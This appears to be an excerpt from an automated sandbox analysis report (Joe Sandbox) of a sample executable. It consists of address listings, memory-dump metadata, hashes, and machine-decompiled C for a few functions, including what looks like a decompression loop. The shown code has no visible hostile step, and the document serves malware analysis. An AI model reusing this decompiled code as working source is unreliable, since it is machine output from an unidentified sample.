                                                    0x00cc8b1c
                                                    0x00cc8b1f
                                                    0x00cc8b1f
                                                    0x00cc8b22
                                                    0x00cc8b29
                                                    0x00cc8b3b
                                                    0x00cc8b3b
                                                    0x00cc8b3e
                                                    0x00cc8b40
                                                    0x00cc8b87
                                                    0x00cc8b87
                                                    0x00cc8b8b
                                                    0x00cc8b8d
                                                    0x00cc8b95
                                                    0x00cc8b95
                                                    0x00cc8ba9
                                                    0x00cc8baf
                                                    0x00cc8bb5
                                                    0x00cc8bbb
                                                    0x00cc8bcc
                                                    0x00cc8be2
                                                    0x00cc8be7
                                                    0x00cc8bed
                                                    0x00cc8bf0
                                                    0x00cc8bf6
                                                    0x00cc8bf9
                                                    0x00cc8bfc
                                                    0x00cc8c03
                                                    0x00cc8c06
                                                    0x00cc8c0c
                                                    0x00cc8c11
                                                    0x00cc8c14
                                                    0x00cc8c16
                                                    0x00cc8c19
                                                    0x00cc8c1c
                                                    0x00cc8c1f
                                                    0x00cc8c22
                                                    0x00cc8c25
                                                    0x00cc8c27
                                                    0x00cc8cd6
                                                    0x00cc8cd6
                                                    0x00cc8cd9
                                                    0x00cc8ce0
                                                    0x00cc8ce7
                                                    0x00cc8ceb
                                                    0x00cc8d01
                                                    0x00cc8d01
                                                    0x00cc8d03
                                                    0x00cc8d06
                                                    0x00cc8d06
                                                    0x00cc8d0a
                                                    0x00cc8d0e
                                                    0x00cc8d12
                                                    0x00cc8e40
                                                    0x00cc8e47
                                                    0x00cc8e49
                                                    0x00cc8e50
                                                    0x00cc8e73
                                                    0x00cc8e74
                                                    0x00cc8e7a
                                                    0x00cc8e7f
                                                    0x00cc8e91
                                                    0x00cc8e97
                                                    0x00cc8e99
                                                    0x00cc8e9f
                                                    0x00cc8eb9
                                                    0x00cc8e52
                                                    0x00cc8e52
                                                    0x00cc8e58
                                                    0x00cc8e5e
                                                    0x00cc8e5f
                                                    0x00cc8e5f
                                                    0x00cc8e50
                                                    0x00cc8ebe
                                                    0x00cc8ec0
                                                    0x00cc8ec5
                                                    0x00cc8ecc
                                                    0x00cc8efe
                                                    0x00cc8efe
                                                    0x00cc8efe
                                                    0x00cc8f00
                                                    0x00cc8f02
                                                    0x00cc8f02
                                                    0x00cc8f09
                                                    0x00cc8f13
                                                    0x00cc8f1a
                                                    0x00cc8f39
                                                    0x00cc8f39
                                                    0x00cc8f3d
                                                    0x00cc8f40
                                                    0x00cc8f98
                                                    0x00cc8f98
                                                    0x00cc8f9c
                                                    0x00cc8f9f
                                                    0x00cc8fb2
                                                    0x00cc8fb2
                                                    0x00cc8fb2
                                                    0x00cc8fb4
                                                    0x00cc8fb4
                                                    0x00cc8fb8
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8fbe
                                                    0x00cc8fc1
                                                    0x00cc8fc5
                                                    0x00cc8fd1
                                                    0x00cc8fd1
                                                    0x00cc8fd5
                                                    0x00cc8ff0
                                                    0x00cc8ff0
                                                    0x00cc8ff2
                                                    0x00cc9007
                                                    0x00cc9007
                                                    0x00cc9009
                                                    0x00cc90cd
                                                    0x00cc90cd
                                                    0x00cc90d0
                                                    0x00cc90d7
                                                    0x00cc90df
                                                    0x00cc90e6
                                                    0x00cc90eb
                                                    0x00cc90ed
                                                    0x00cc90f6
                                                    0x00cc9100
                                                    0x00cc9100
                                                    0x00cc90ed
                                                    0x00cc9105
                                                    0x00000000
                                                    0x00cc9105
                                                    0x00cc900f
                                                    0x00cc9014
                                                    0x00cc9016
                                                    0x00cc9019
                                                    0x00cc901f
                                                    0x00cc901f
                                                    0x00cc9021
                                                    0x00cc9033
                                                    0x00cc9033
                                                    0x00cc9039
                                                    0x00cc903e
                                                    0x00cc9047
                                                    0x00cc905b
                                                    0x00cc9062
                                                    0x00cc9075
                                                    0x00cc9077
                                                    0x00cc9080
                                                    0x00cc9085
                                                    0x00cc908b
                                                    0x00cc909a
                                                    0x00cc90ad
                                                    0x00cc90c0
                                                    0x00cc90c2
                                                    0x00cc90c5
                                                    0x00cc90ca
                                                    0x00000000
                                                    0x00cc90ca
                                                    0x00cc9023
                                                    0x00cc9029
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc902b
                                                    0x00cc9031
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc9031
                                                    0x00cc901b
                                                    0x00cc901d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc901d
                                                    0x00cc8ff4
                                                    0x00cc8ff7
                                                    0x00cc8ffe
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc9004
                                                    0x00000000
                                                    0x00cc9004
                                                    0x00cc8fd7
                                                    0x00cc8fd9
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8fdb
                                                    0x00cc8fe2
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8fe8
                                                    0x00cc8fea
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8fea
                                                    0x00cc8fc7
                                                    0x00cc8fcb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8fcb
                                                    0x00cc8fa1
                                                    0x00cc8fa8
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8faa
                                                    0x00cc8fac
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8fae
                                                    0x00000000
                                                    0x00cc8fae
                                                    0x00cc8f42
                                                    0x00cc8f46
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8f48
                                                    0x00cc8f4a
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8f4c
                                                    0x00cc8f52
                                                    0x00cc8f71
                                                    0x00cc8f71
                                                    0x00cc8f73
                                                    0x00cc8f73
                                                    0x00cc8f74
                                                    0x00cc8f80
                                                    0x00cc8f8c
                                                    0x00cc8f90
                                                    0x00cc8f95
                                                    0x00000000
                                                    0x00cc8f95
                                                    0x00cc8f54
                                                    0x00cc8f5a
                                                    0x00cc8f64
                                                    0x00cc8f64
                                                    0x00cc8f6b
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8f6d
                                                    0x00000000
                                                    0x00cc8f6d
                                                    0x00cc8f5c
                                                    0x00cc8f62
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8f62
                                                    0x00cc8f1c
                                                    0x00cc8f22
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8f24
                                                    0x00cc8f2e
                                                    0x00cc8f2e
                                                    0x00cc8f30
                                                    0x00cc8f32
                                                    0x00cc8f32
                                                    0x00000000
                                                    0x00cc8f30
                                                    0x00cc8f26
                                                    0x00cc8f2c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8f2c
                                                    0x00cc8f0b
                                                    0x00000000
                                                    0x00cc8f0b
                                                    0x00cc8edd
                                                    0x00cc8eef
                                                    0x00cc8ef4
                                                    0x00cc8ef6
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8ef8
                                                    0x00cc8efa
                                                    0x00000000
                                                    0x00cc8efa
                                                    0x00cc8d18
                                                    0x00cc8d1e
                                                    0x00cc8d21
                                                    0x00cc8d8a
                                                    0x00cc8d8a
                                                    0x00cc8d8f
                                                    0x00cc8d9c
                                                    0x00cc8d9d
                                                    0x00cc8da2
                                                    0x00cc8da7
                                                    0x00cc8dad
                                                    0x00cc8db0
                                                    0x00cc8db7
                                                    0x00cc8db8
                                                    0x00cc8dbd
                                                    0x00cc8dc0
                                                    0x00cc8dc2
                                                    0x00cc8e19
                                                    0x00cc8e19
                                                    0x00cc8e1c
                                                    0x00cc8e1c
                                                    0x00cc8e23
                                                    0x00cc8d57
                                                    0x00cc8d57
                                                    0x00cc8d59
                                                    0x00cc8e36
                                                    0x00cc8e36
                                                    0x00cc8e36
                                                    0x00cc8e38
                                                    0x00cc8e38
                                                    0x00000000
                                                    0x00cc8e38
                                                    0x00cc8d5f
                                                    0x00cc8d5f
                                                    0x00cc8d61
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8d67
                                                    0x00000000
                                                    0x00cc8d67
                                                    0x00cc8e29
                                                    0x00cc8e2b
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8d53
                                                    0x00cc8d53
                                                    0x00000000
                                                    0x00cc8d53
                                                    0x00cc8dc4
                                                    0x00cc8dcc
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc8dce
                                                    0x00cc8dd4
                                                    0x00cc8de0
                                                    0x00cc8de1
                                                    0x00cc8de4
                                                    0x00cc8dfa
                                                    0x00cc8dfb
                                                    0x00cc8e02
                                                    0x00cc8e07
                                                    0x00cc8e09
                                                    0x00cc8e0c

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 68defd8adcf2535e8033e50f6373c8160eea9dc2bfc65cdfd5d2643abcf1583a
                                                    • Instruction ID: 7c96fdd495a8cfb93c4b101d06abf84f789af1523dcd4e85a4bd20ff232e61cc
                                                    • Opcode Fuzzy Hash: 68defd8adcf2535e8033e50f6373c8160eea9dc2bfc65cdfd5d2643abcf1583a
                                                    • Instruction Fuzzy Hash: 9482F870904245AEDF15DB64C895FFBBBB9AF05300F0841BEE8599B282DB705B8DDB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDF9D5() {
                                                    				_Unknown_base(*)()* _t1;
                                                    
                                                    				_t1 = SetUnhandledExceptionFilter(E00CDF9F0); // executed
                                                    				return _t1;
                                                    			}




                                                    0x00cdf9da
                                                    0x00cdf9e0

                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_0001F9F0,00CDF3A5), ref: 00CDF9DA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: f74d8a8997d7c039c2c5cfb488a856382638142848cde2dd5f72325cdd2842b7
                                                    • Instruction ID: 8028973fb022e60138ddea80e6a117f7bfa10d7d337e0f4e64088a8a45399b0c
                                                    • Opcode Fuzzy Hash: f74d8a8997d7c039c2c5cfb488a856382638142848cde2dd5f72325cdd2842b7
                                                    • Instruction Fuzzy Hash:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 88%
                                                    			E00CD6CDC(signed int __ecx, void* __edx) {
                                                    				void* __ebp;
                                                    				intOrPtr _t166;
                                                    				intOrPtr _t170;
                                                    				signed int _t176;
                                                    				signed int _t179;
                                                    				intOrPtr _t182;
                                                    				signed int _t185;
                                                    				signed int _t186;
                                                    				void* _t189;
                                                    				void* _t196;
                                                    				signed int _t201;
                                                    				signed int _t202;
                                                    				intOrPtr* _t203;
                                                    				signed int _t206;
                                                    				void* _t217;
                                                    				intOrPtr _t220;
                                                    				signed int _t223;
                                                    				signed int _t226;
                                                    				signed int _t230;
                                                    				signed int _t232;
                                                    				intOrPtr _t235;
                                                    				intOrPtr* _t236;
                                                    				intOrPtr* _t242;
                                                    				intOrPtr* _t244;
                                                    				void* _t247;
                                                    				signed int _t249;
                                                    				signed int _t250;
                                                    				signed int _t252;
                                                    				intOrPtr _t257;
                                                    				signed int _t265;
                                                    				intOrPtr* _t269;
                                                    				intOrPtr _t272;
                                                    				signed int _t275;
                                                    				signed int _t276;
                                                    				signed int _t278;
                                                    				intOrPtr* _t280;
                                                    				intOrPtr* _t282;
                                                    				void* _t283;
                                                    				signed int _t284;
                                                    				intOrPtr* _t285;
                                                    				intOrPtr _t287;
                                                    				void* _t289;
                                                    				void* _t290;
                                                    				void* _t292;
                                                    
                                                    				_t223 = __ecx; // executed
                                                    				E00CD359E(__ecx, __edx); // executed
                                                    				E00CD4D0A(__ecx,  *((intOrPtr*)(_t290 + 0x244)));
                                                    				_t282 = _t223 + 0x18;
                                                    				_t249 = 0;
                                                    				 *((intOrPtr*)(_t290 + 0x14)) = _t282;
                                                    				if( *(_t223 + 0x1c) +  *(_t223 + 0x1c) == 0) {
                                                    					 *((intOrPtr*)(_t290 + 0x14)) = _t282;
                                                    				} else {
                                                    					_t247 = 0;
                                                    					do {
                                                    						_t220 =  *_t282;
                                                    						_t247 = _t247 + 0x4ae4;
                                                    						_t249 = _t249 + 1;
                                                    						 *((char*)(_t220 + _t247 - 0x13)) = 0;
                                                    						 *((char*)(_t220 + _t247 - 0x11)) = 0;
                                                    					} while (_t249 <  *(_t223 + 0x1c) +  *(_t223 + 0x1c));
                                                    				}
                                                    				_t226 = 5;
                                                    				memcpy( *_t282 + 0x18, _t223 + 0x8c, _t226 << 2);
                                                    				E00CE0320( *_t282 + 0x30, _t223 + 0xa0, 0x4a9c);
                                                    				_t292 = _t290 + 0x18;
                                                    				 *(_t292 + 0x30) = 0;
                                                    				_t265 = 0;
                                                    				 *((char*)(_t292 + 0x1b)) = 0;
                                                    				 *((char*)(_t292 + 0x13)) = 0;
                                                    				while(1) {
                                                    					L6:
                                                    					_t272 = 0;
                                                    					 *((intOrPtr*)(_t292 + 0x1c)) = 0;
                                                    					while(1) {
                                                    						L7:
                                                    						_push(0x00400000 - _t265 & 0xfffffff0);
                                                    						_push( *((intOrPtr*)(_t223 + 0x20)) + _t265);
                                                    						_t166 = E00CCD114( *_t223);
                                                    						 *((intOrPtr*)(_t292 + 0x34)) = _t166;
                                                    						if(_t166 < 0) {
                                                    							break;
                                                    						}
                                                    						_t265 = _t265 + _t166;
                                                    						 *(_t292 + 0x2c) = _t265;
                                                    						if(_t265 != 0) {
                                                    							if(_t166 <= 0 || _t265 >= 0x400) {
                                                    								if(_t272 >= _t265) {
                                                    									goto L69;
                                                    								} else {
                                                    									while(1) {
                                                    										_t252 = 0;
                                                    										 *(_t292 + 0x28) =  *(_t292 + 0x28) & 0;
                                                    										 *(_t292 + 0x24) = 0;
                                                    										_t176 =  *(_t223 + 0x1c) +  *(_t223 + 0x1c);
                                                    										if(_t176 != 0) {
                                                    										}
                                                    										L13:
                                                    										_t235 = 0;
                                                    										 *((intOrPtr*)(_t292 + 0x20)) = 0;
                                                    										while(1) {
                                                    											_t280 =  *_t282 + _t235;
                                                    											 *(_t292 + 0x30) = _t252;
                                                    											_t29 = _t280 + 4; // 0x4
                                                    											_t236 = _t29;
                                                    											 *_t280 = _t223;
                                                    											if( *((char*)(_t280 + 0x4ad3)) == 0) {
                                                    												goto L16;
                                                    											}
                                                    											L15:
                                                    											 *(_t280 + 0x4acc) = _t265;
                                                    											L18:
                                                    											_t42 = _t280 + 0x18; // 0x18
                                                    											_t285 = _t42;
                                                    											 *((char*)(_t280 + 0x4ad3)) = 0;
                                                    											 *(_t280 + 0x4ae0) = _t252;
                                                    											 *((char*)(_t280 + 0x4ad2)) = _t176 & 0xffffff00 |  *((intOrPtr*)(_t292 + 0x34)) == 0x00000000;
                                                    											if( *((char*)(_t280 + 0x14)) != 0) {
                                                    												L23:
                                                    												if( *((char*)(_t292 + 0x1b)) != 0 ||  *_t285 > 0x20000) {
                                                    													 *((char*)(_t280 + 0x4ad1)) = 1;
                                                    													 *((char*)(_t292 + 0x1b)) = 1;
                                                    												} else {
                                                    													 *(_t292 + 0x28) =  *(_t292 + 0x28) + 1;
                                                    												}
                                                    												_t287 =  *((intOrPtr*)(_t292 + 0x1c)) +  *((intOrPtr*)(_t280 + 0x24)) +  *_t285;
                                                    												_t252 = _t252 + 1;
                                                    												 *((intOrPtr*)(_t292 + 0x1c)) = _t287;
                                                    												_t235 =  *((intOrPtr*)(_t292 + 0x20)) + 0x4ae4;
                                                    												 *(_t292 + 0x24) = _t252;
                                                    												 *((intOrPtr*)(_t292 + 0x20)) = _t235;
                                                    												_t217 = _t265 - _t287;
                                                    												if(_t217 < 0 ||  *((char*)(_t280 + 0x28)) == 0) {
                                                    													if(_t217 >= 0x400) {
                                                    														_t176 =  *(_t223 + 0x1c) +  *(_t223 + 0x1c);
                                                    														if(_t252 < _t176) {
                                                    															_t282 =  *((intOrPtr*)(_t292 + 0x14));
                                                    															_t280 =  *_t282 + _t235;
                                                    															 *(_t292 + 0x30) = _t252;
                                                    															_t29 = _t280 + 4; // 0x4
                                                    															_t236 = _t29;
                                                    															 *_t280 = _t223;
                                                    															if( *((char*)(_t280 + 0x4ad3)) == 0) {
                                                    																goto L16;
                                                    															}
                                                    														}
                                                    													}
                                                    												}
                                                    											} else {
                                                    												_push(_t285);
                                                    												_push(_t236);
                                                    												 *((char*)(_t280 + 0x14)) = 1;
                                                    												if(E00CD3E0B(_t223) == 0 ||  *((char*)(_t280 + 0x29)) == 0 &&  *((char*)(_t223 + 0xe662)) == 0) {
                                                    													 *((char*)(_t292 + 0x13)) = 1;
                                                    												} else {
                                                    													_t252 =  *(_t292 + 0x24);
                                                    													 *((char*)(_t223 + 0xe662)) = 1;
                                                    													goto L23;
                                                    												}
                                                    											}
                                                    											break;
                                                    											L16:
                                                    											E00CCA85A(_t236,  *((intOrPtr*)(_t223 + 0x20)) +  *((intOrPtr*)(_t292 + 0x1c)));
                                                    											_t33 = _t280 + 4; // 0x4
                                                    											_t236 = _t33;
                                                    											 *((intOrPtr*)(_t236 + 4)) = 0;
                                                    											_t176 = _t265 -  *((intOrPtr*)(_t292 + 0x1c));
                                                    											__eflags = _t176;
                                                    											 *_t236 = 0;
                                                    											 *(_t280 + 0x4acc) = _t176;
                                                    											if(_t176 != 0) {
                                                    												 *((char*)(_t280 + 0x4ad0)) = 0;
                                                    												 *((char*)(_t280 + 0x14)) = 0;
                                                    												 *((char*)(_t280 + 0x2c)) = 0;
                                                    												_t252 =  *(_t292 + 0x24);
                                                    												goto L18;
                                                    											}
                                                    											break;
                                                    										}
                                                    										L33:
                                                    										_t232 =  *(_t292 + 0x28);
                                                    										_t275 = _t232 /  *(_t223 + 0x1c);
                                                    										_t179 = _t232;
                                                    										__eflags = _t179 %  *(_t223 + 0x1c);
                                                    										if(_t179 %  *(_t223 + 0x1c) != 0) {
                                                    											_t275 = _t275 + 1;
                                                    											__eflags = _t275;
                                                    										}
                                                    										_t283 = 0;
                                                    										__eflags = _t232;
                                                    										if(_t232 != 0) {
                                                    											_t269 =  *((intOrPtr*)(_t292 + 0x14));
                                                    											_t257 = 0;
                                                    											_t202 = _t275 * 0x4ae4;
                                                    											__eflags = _t202;
                                                    											 *((intOrPtr*)(_t292 + 0x20)) = 0;
                                                    											 *(_t292 + 0x38) = _t202;
                                                    											_t203 = _t292 + 0x40;
                                                    											do {
                                                    												_t258 = _t257 +  *_t269;
                                                    												_t244 = _t203;
                                                    												 *((intOrPtr*)(_t292 + 0x3c)) = _t203 + 8;
                                                    												_t206 =  *(_t292 + 0x28) - _t283;
                                                    												 *_t244 = _t257 +  *_t269;
                                                    												__eflags = _t275 - _t206;
                                                    												if(_t275 < _t206) {
                                                    													_t206 = _t275;
                                                    												}
                                                    												__eflags =  *(_t292 + 0x24) - 1;
                                                    												 *(_t244 + 4) = _t206;
                                                    												if( *(_t292 + 0x24) != 1) {
                                                    													E00CD0F86( *((intOrPtr*)(_t223 + 0x14)), E00CD77C0, _t244);
                                                    												} else {
                                                    													E00CD7153(_t223, _t258);
                                                    												}
                                                    												_t283 = _t283 + _t275;
                                                    												_t257 =  *((intOrPtr*)(_t292 + 0x20)) +  *(_t292 + 0x38);
                                                    												_t203 =  *((intOrPtr*)(_t292 + 0x3c));
                                                    												 *((intOrPtr*)(_t292 + 0x20)) = _t257;
                                                    												__eflags = _t283 -  *(_t292 + 0x28);
                                                    											} while (_t283 <  *(_t292 + 0x28));
                                                    											_t265 =  *(_t292 + 0x2c);
                                                    										}
                                                    										_t284 =  *(_t292 + 0x24);
                                                    										__eflags = _t284;
                                                    										if(_t284 == 0) {
                                                    											_t272 =  *((intOrPtr*)(_t292 + 0x1c));
                                                    											goto L68;
                                                    										} else {
                                                    											E00CD11CF( *((intOrPtr*)(_t223 + 0x14)));
                                                    											_t276 = 0;
                                                    											__eflags = _t284;
                                                    											if(_t284 == 0) {
                                                    												L55:
                                                    												__eflags =  *((char*)(_t292 + 0x13));
                                                    												if( *((char*)(_t292 + 0x13)) == 0) {
                                                    													_t182 =  *((intOrPtr*)(_t292 + 0x1c));
                                                    													_t278 = _t265 - _t182;
                                                    													__eflags = _t278 - 0x400;
                                                    													if(_t278 < 0x400) {
                                                    														__eflags = _t278;
                                                    														if(__eflags >= 0) {
                                                    															if(__eflags > 0) {
                                                    																__eflags = _t182 +  *((intOrPtr*)(_t223 + 0x20));
                                                    																E00CE0320( *((intOrPtr*)(_t223 + 0x20)), _t182 +  *((intOrPtr*)(_t223 + 0x20)), _t278);
                                                    																_t292 = _t292 + 0xc;
                                                    															}
                                                    															_t282 =  *((intOrPtr*)(_t292 + 0x14));
                                                    															_t265 = _t278;
                                                    															goto L6;
                                                    														}
                                                    													} else {
                                                    														_t282 =  *((intOrPtr*)(_t292 + 0x14));
                                                    														_t272 = _t182;
                                                    														__eflags = _t272 - _t265;
                                                    														if(_t272 >= _t265) {
                                                    															goto L7;
                                                    														} else {
                                                    															_t252 = 0;
                                                    															 *(_t292 + 0x28) =  *(_t292 + 0x28) & 0;
                                                    															 *(_t292 + 0x24) = 0;
                                                    															_t176 =  *(_t223 + 0x1c) +  *(_t223 + 0x1c);
                                                    															if(_t176 != 0) {
                                                    															}
                                                    															goto L33;
                                                    														}
                                                    													}
                                                    												}
                                                    											} else {
                                                    												_t185 = 0;
                                                    												__eflags = 0;
                                                    												 *((intOrPtr*)(_t292 + 0x20)) = 0;
                                                    												do {
                                                    													_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x14)))) + _t185;
                                                    													__eflags =  *((char*)(_t289 + 0x4ad1));
                                                    													if( *((char*)(_t289 + 0x4ad1)) != 0) {
                                                    														L50:
                                                    														_t186 = E00CD77EF(_t223, _t289);
                                                    														__eflags = _t186;
                                                    														if(_t186 != 0) {
                                                    															goto L51;
                                                    														}
                                                    													} else {
                                                    														_t201 = E00CD390D(_t223, _t289);
                                                    														__eflags = _t201;
                                                    														if(_t201 != 0) {
                                                    															__eflags =  *((char*)(_t289 + 0x4ad1));
                                                    															if( *((char*)(_t289 + 0x4ad1)) == 0) {
                                                    																L51:
                                                    																__eflags =  *((char*)(_t289 + 0x4ad0));
                                                    																if( *((char*)(_t289 + 0x4ad0)) == 0) {
                                                    																	__eflags =  *((char*)(_t289 + 0x4ad3));
                                                    																	if( *((char*)(_t289 + 0x4ad3)) != 0) {
                                                    																		_t241 =  *((intOrPtr*)(_t223 + 0x20));
                                                    																		_t189 =  *((intOrPtr*)(_t289 + 0x10)) -  *((intOrPtr*)(_t223 + 0x20)) +  *(_t289 + 4);
                                                    																		__eflags = _t265 - _t189;
                                                    																		if(_t265 > _t189) {
                                                    																			_t265 = _t265 - _t189;
                                                    																			 *(_t292 + 0x38) = _t265;
                                                    																			E00CE0320(_t241, _t189 + _t241, _t265);
                                                    																			_t292 = _t292 + 0xc;
                                                    																			 *((intOrPtr*)(_t289 + 0x18)) =  *((intOrPtr*)(_t289 + 0x18)) +  *(_t289 + 0x20) -  *(_t289 + 4);
                                                    																			 *(_t289 + 0x24) =  *(_t289 + 0x24) & 0x00000000;
                                                    																			 *(_t289 + 0x20) =  *(_t289 + 0x20) & 0x00000000;
                                                    																			 *(_t289 + 4) =  *(_t289 + 4) & 0x00000000;
                                                    																			 *((intOrPtr*)(_t289 + 0x10)) =  *((intOrPtr*)(_t223 + 0x20));
                                                    																			__eflags = _t276;
                                                    																			if(_t276 != 0) {
                                                    																				_t196 =  *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x14))));
                                                    																				E00CE0320(_t196, _t289, 0x4ae4);
                                                    																				_t242 =  *((intOrPtr*)(_t292 + 0x20));
                                                    																				_t292 = _t292 + 0xc;
                                                    																				 *((intOrPtr*)( *_t242 + 0x4ad4)) =  *((intOrPtr*)(_t196 + 0x4ad4));
                                                    																				 *((intOrPtr*)( *_t242 + 0x4adc)) =  *((intOrPtr*)(_t196 + 0x4adc));
                                                    																				_t265 =  *(_t292 + 0x2c);
                                                    																				 *((char*)(_t289 + 0x4ad3)) = 0;
                                                    																			}
                                                    																			_t272 = 0;
                                                    																			 *((intOrPtr*)(_t292 + 0x1c)) = 0;
                                                    																			L68:
                                                    																			_t282 =  *((intOrPtr*)(_t292 + 0x14));
                                                    																			goto L69;
                                                    																		}
                                                    																	} else {
                                                    																		__eflags =  *((char*)(_t289 + 0x28));
                                                    																		if( *((char*)(_t289 + 0x28)) == 0) {
                                                    																			goto L54;
                                                    																		}
                                                    																	}
                                                    																}
                                                    															} else {
                                                    																goto L50;
                                                    															}
                                                    														}
                                                    													}
                                                    													goto L70;
                                                    													L54:
                                                    													_t276 = _t276 + 1;
                                                    													_t185 =  *((intOrPtr*)(_t292 + 0x20)) + 0x4ae4;
                                                    													 *((intOrPtr*)(_t292 + 0x20)) = _t185;
                                                    													__eflags = _t276 -  *(_t292 + 0x24);
                                                    												} while (_t276 <  *(_t292 + 0x24));
                                                    												goto L55;
                                                    											}
                                                    										}
                                                    										goto L70;
                                                    									}
                                                    								}
                                                    							} else {
                                                    								L69:
                                                    								__eflags =  *((char*)(_t292 + 0x13));
                                                    								if( *((char*)(_t292 + 0x13)) == 0) {
                                                    									continue;
                                                    								}
                                                    							}
                                                    						}
                                                    						break;
                                                    					}
                                                    					L70:
                                                    					 *(_t223 + 0x7c) =  *(_t223 + 0x7c) &  *(_t223 + 0xe6dc);
                                                    					E00CD5202(_t223);
                                                    					_t250 =  *(_t292 + 0x30) * 0x4ae4;
                                                    					_t230 = 5;
                                                    					_t170 =  *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x14))));
                                                    					__eflags = _t170 + _t250 + 0x30;
                                                    					return E00CE0320(memcpy(_t223 + 0x8c, _t250 + 0x18 + _t170, _t230 << 2), _t170 + _t250 + 0x30, 0x4a9c);
                                                    				}
                                                    			}


                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 4fef0463c55561e4cb0853f78efe14c9b1eac8b2687300ff5efe79ce0afecbeb
                                                    • Instruction ID: 8e38d2af33534c81c1ed77906e0c655307167e88fbd08b26ed188992bed0657c
                                                    • Opcode Fuzzy Hash: 4fef0463c55561e4cb0853f78efe14c9b1eac8b2687300ff5efe79ce0afecbeb
                                                    • Instruction Fuzzy Hash: 8CD1F8B16083408FDB14CF28C98475BBBE1BF89308F08456EFA999B342D774EA05CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 78%
                                                    			E00CDB7E0(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* _t105;
                                                    				int _t106;
                                                    				long _t108;
                                                    				long _t109;
                                                    				struct HWND__* _t110;
                                                    				struct HWND__* _t114;
                                                    				void* _t117;
                                                    				void* _t118;
                                                    				void* _t135;
                                                    				void* _t139;
                                                    				signed int _t152;
                                                    				struct HWND__* _t155;
                                                    				void* _t173;
                                                    				int _t186;
                                                    				signed int _t201;
                                                    				void* _t202;
                                                    				long _t210;
